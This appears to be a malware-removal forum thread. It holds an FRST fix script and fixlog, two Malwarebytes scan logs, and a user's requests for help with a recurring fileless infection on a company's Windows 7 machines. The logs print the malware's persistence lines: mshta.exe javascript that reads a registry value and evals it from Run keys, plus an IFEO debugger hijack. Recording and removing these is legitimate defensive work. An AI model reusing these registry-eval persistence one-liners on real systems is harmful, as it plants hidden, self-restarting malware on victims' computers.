HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**wqgzvwnow<*>] => "C:\Users\cjerald\AppData\Local\322148\4c5510.lnk" <===== ATTENTION (Value Name with invalid characters)
C:\Users\cjerald\AppData\Local\322148\4c5510.lnk
C:\Users\cjerald\AppData\Local\322148
IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
GroupPolicyScripts: Restriction <======= ATTENTION
GroupPolicyScripts\User: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
S4 LMIRfsClientNP; no ImagePath
S3 aswVmm; \??\C:\Users\cjerald\AppData\Local\Temp\aswVmm.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
Shortcut: C:\Users\cjerald\AppData\Local\322148\4c5510.lnk -> C:\Users\cjerald\AppData\Local\322148\83934e.bat ()
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Classes\d122cd: "C:\Windows\system32\mshta.exe" "javascript:iPH9j5="V15iBXVx";s12d=new ActiveXObject("WScript.Shell");M40aWd="cEsTuKN";TtXA7=s12d.RegRead("HKCU\\software\\auux\\onnlw");FU76Gv="LccebV4j";eval(TtXA7);Br6Aj="O1GiJK";" <===== ATTENTION
CMD: ipconfig /flushdns
Hosts:
EmptyTemp:
end
*****************

Restore point was successfully created.
Processes closed successfully.
KU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**pmrnby<*>] => "C:\Windows\system32\mshta.exe" javascript:T3ijyR1="CI6m7d";C90X=new%20ActiveXObject("WScript.Shell");v3atS8h="c";uT1ax2=C90X.RegRead("HKCU\\software\\auux\\onnlw");LK9oPb9="8oAt";eval(uT1ax2);Xr1GT=" (the data entry has 8 more characters). <===== ATTENTION (Value Name with invalid characters) => Error: No automatic fix found for this entry.
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Run\\**wqgzvwnow<*> => value removed successfully
C:\Users\cjerald\AppData\Local\322148\4c5510.lnk => moved successfully
C:\Users\cjerald\AppData\Local\322148 => moved successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ehshell.exe" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => key removed successfully
HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found.
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Windows\system32\GroupPolicy\User => moved successfully
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
LMIRfsClientNP => service removed successfully
aswVmm => service removed successfully
catchme => service removed successfully
C:\Users\cjerald\AppData\Local\322148\4c5510.lnk => not found.
"HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Classes\d122cd" => key removed successfully

========= ipconfig /flushdns =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.


========= End of CMD: =========

"C:\Windows\System32\Drivers\etc\hosts" => Could not move. Could not restore Hosts.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 10156192 B
Java, Flash, Steam htmlcache => 19615 B
Windows/system/drivers => 18531 B
Edge => 0 B
Chrome => 71066066 B
Firefox => 2293760 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 33058 B
systemprofile32 => 33186 B
LocalService => 66228 B
NetworkService => 0 B
clayton => 1102190 B
cjerald => 640332832 B
Connie => 58687 B
UpdatusUser => 0 B

RecycleBin => 56445 B
EmptyTemp: => 699.6 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 02:13:38 ====

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/22/2016
Scan Time: 12:52 AM
Logfile:
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.11.22.05
Rootkit Database: v2016.11.20.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: CJerald

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 392922
Time Elapsed: 10 min, 58 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 1
Rootkit.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148_Classes\D122CD\SHELL\OPEN\COMMAND, Quarantined, [0647972c7a20f5413436964556ac1de3],

Registry Values: 3
Trojan.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^wqgzvwnow, Quarantined, [113cdbe8a3f73ff760095588d131857b],
Trojan.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^pmrnby, Quarantined, [1c31ae151a80270fc5a329b46e948878],
Rootkit.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148_Classes\d122cd\SHELL\OPEN\COMMAND, "C:\Windows\system32\mshta.exe" "javascript:s0PmbB6="2IgugC";K9V=new ActiveXObject("WScript.Shell");HJ7J6r="eNJ";VJ0zZ=K9V.RegRead("HKCU\\software\\auux\\onnlw");uj6Zkjh="Pmye";eval(VJ0zZ);uf6RJX="K1zwrl";", Quarantined, [0647972c7a20f5413436964556ac1de3]

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 2
PUP.Optional.InstallCore, \\SPARTA\REDIRECTEDFOLDERS\SPARTA\REDIRECTEDFOLDERS\cjerald\MY DOCUMENTS\downloads\PDFConverterSetup.exe, Quarantined, [2d203c879901be78370e2d0cd0312cd4],
Rootkit.Fileless.MTGen, C:\Users\cjerald\AppData\Local\322148\83934e.bat, Quarantined, [60ed408337630f27d113b6e1ca3916ea],

Physical Sectors: 0
(No malicious items detected)


(end)

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/22/2016
Scan Time: 1:22 AM
Logfile:
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.11.22.05
Rootkit Database: v2016.11.20.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: cjerald

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 392613
Time Elapsed: 14 min, 58 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 2
Trojan.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^pmrnby, , [66e7a2211486c76f05630bd21de5a957],
Trojan.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^wqgzvwnow, , [014c6c574b4f55e142277469d82aad53],

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 1
Rootkit.Fileless.MTGen, C:\Users\cjerald\AppData\Local\322148\83934e.bat, , [4ffec7fc9a0095a108dcc2d59a69a060],

Physical Sectors: 0
(No malicious items detected)


(end)
  13. Yes. It is at a company I'm helping. Since you haven't replied with instructions, can you still help? Hope I haven't crossed some line. Thanks in advance.
  14. Appears I have another system infected. Assistance appreciated. - CT FRST.txt Addition.txt
  15. It always reappears. I've tried Malwarebytes, Malwarebytes Anti-Rootkit, Panda Anti-Rootkit, ESET Online Scanner, and Sophos AntiVirus. OB1, where are you? LOL Thanks in advance. FRST.txt Addition.txt